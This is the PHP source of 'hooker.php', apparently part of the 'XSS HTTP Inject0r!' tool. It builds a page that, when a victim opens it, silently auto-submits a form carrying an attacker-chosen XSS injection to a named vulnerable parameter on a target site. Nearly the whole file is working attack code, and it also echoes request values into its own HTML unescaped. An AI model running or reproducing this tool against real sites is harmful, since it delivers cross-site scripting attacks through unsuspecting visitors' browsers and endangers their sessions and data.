hooker.php 3.5 KB

123456789101112131415161718192021222324252627282930313233343536373839404142434445464748495051525354555657585960616263646566676869707172737475767778798081828384858687888990919293949596979899100101102103104105106107108109110
  1. <?php
  2. $target = $_REQUEST["target"];
  3. $vulnerability = $_REQUEST["vulnerability"];
  4. $injection = $_REQUEST["injection"];
  5. ?>
  6. <!doctype html><html itemscope="" itemtype="http://schema.org/WebPage" lang="en">
  7. <head><title>XSS HTTP Inject0r!</title>
  8. <meta http-equiv="content-type" content="text/html;charset=utf-8">
  9. <link rel="shortcut icon" href="images/favicon.ico" type="image/x-icon">
  10. <style type="text/css">
  11. <!--
  12. body,td,th {
  13. color: #FFFFFF;
  14. }
  15. body {
  16. background-color: #000000;
  17. }
  18. a {
  19. color:lime;
  20. }
  21. -->
  22. </style>
  23. <script type="text/javascript">
  24. function SetUrl(frm){
  25. var ip = "<?php echo $_SERVER['SERVER_NAME']; ?>";
  26. var dir = "<?php echo preg_replace("/\?.*$/","",str_replace("hooker.php", "Index.html", $_SERVER['REQUEST_URI'])); ?>";
  27. alert("HOOK's URL: " +ip+dir);
  28. }
  29. </script>
  30. <?php
  31. if(isset($_REQUEST['generate']))
  32. {
  33. generate();
  34. }
  35. ?>
  36. </head>
  37. <body>
  38. <center>
  39. <br />| <a href="https://github.com/epsylon/xss-http-injector" target="_blank">XSS HTTP Inject0r!</a> - 2014 - <a href="http://gplv3.fsf.org" target="_blank">GPLv3</a> |<br /><br />
  40. <img src="images/pwned.jpg" width="350" height="203" border="1"><br />
  41. 'Hook' targets to execute XSS exploits on their browsers... |<a href="index.html">Back</a>|<br /><br />
  42. <form method="POST" name="hook_frm">
  43. <table border="1">
  44. <tr>
  45. <td>1-</td>
  46. <td>
  47. <table>
  48. <tr>
  49. <td><u>Target</u> (Url to target's form):</td><td><input type="text" name="target" value='<?php echo $target;?>' size="35" readonly></td>
  50. </tr>
  51. <tr>
  52. <td><u>Vulnerability</u> (Vulnerable parameter):</td><td><input type="text" name="vulnerability" value='<?php echo $vulnerability;?>' readonly></td>
  53. </tr>
  54. <tr>
  55. <td><u>Injection</u> (Code to inject):</td><td><textarea name="injection" cols="40" rows="1" readonly><?php echo ($injection);?></textarea></td>
  56. </tr>
  57. <tr>
  58. <td><u>Method</u> (GET/POST):</td><td><input type="text" name="method" value='<?php echo $_REQUEST["method"];?>' readonly></td>
  59. </tr>
  60. </table>
  61. </td>
  62. </tr>
  63. <tr>
  64. <td>2-</td>
  65. <td>
  66. <table>
  67. <tr>
  68. <td><u>File</u>:</td><td>Index.html</td>
  69. </tr>
  70. </table>
  71. </td>
  72. </tr>
  73. <tr>
  74. <td>3-</td><td><center><br /><input type="submit" value="Generate Hook!" name="generate" onclick="javascript:SetUrl();" style="padding: 10px; font-weight:bold;"><br /><br /></center></td>
  75. </tr>
  76. </table>
  77. </form>
  78. <?php
  79. function generate()
  80. {
  81. $target = $_REQUEST["target"];
  82. $vulnerability = $_REQUEST["vulnerability"];
  83. $injection = utf8_decode($_REQUEST["injection"]);
  84. $injection = htmlentities($injection, ENT_QUOTES);
  85. $sHTML_Header = "<html><head><title></title><meta http-equiv='content-type' content='text/html;charset=utf-8'><script>function xss(){document.f.s.click();}</script></head>";
  86. $sHTML_Content = "<body onload='xss();'><form method='".$_REQUEST['method']."' name='f' action='$target'><input name='$vulnerability' value='$injection'><input type='submit' name='s'></form>";
  87. $sHTML_Footer = "</body></html>";
  88. $filename = "Index.html"; // this is the filename of the archive ('hook') generated on your server.
  89. if (is_writable(getcwd())) {
  90. IF (!$handle = fopen($filename, 'w')) {
  91. echo "Cannot open file ($filename)";
  92. exit;
  93. }
  94. if (fwrite($handle, $sHTML_Header) === FALSE) {
  95. echo "Cannot write to file ($filename)";
  96. exit;
  97. }else{
  98. fwrite($handle, $sHTML_Content);
  99. fwrite($handle, $sHTML_Footer);
  100. }
  101. fclose($handle);
  102. }else{
  103. echo "The file $filename is not writable (use: chown www-data:www-data $filename)";
  104. }
  105. }
  106. ?>
  107. </center>
  108. </body>
  109. </html>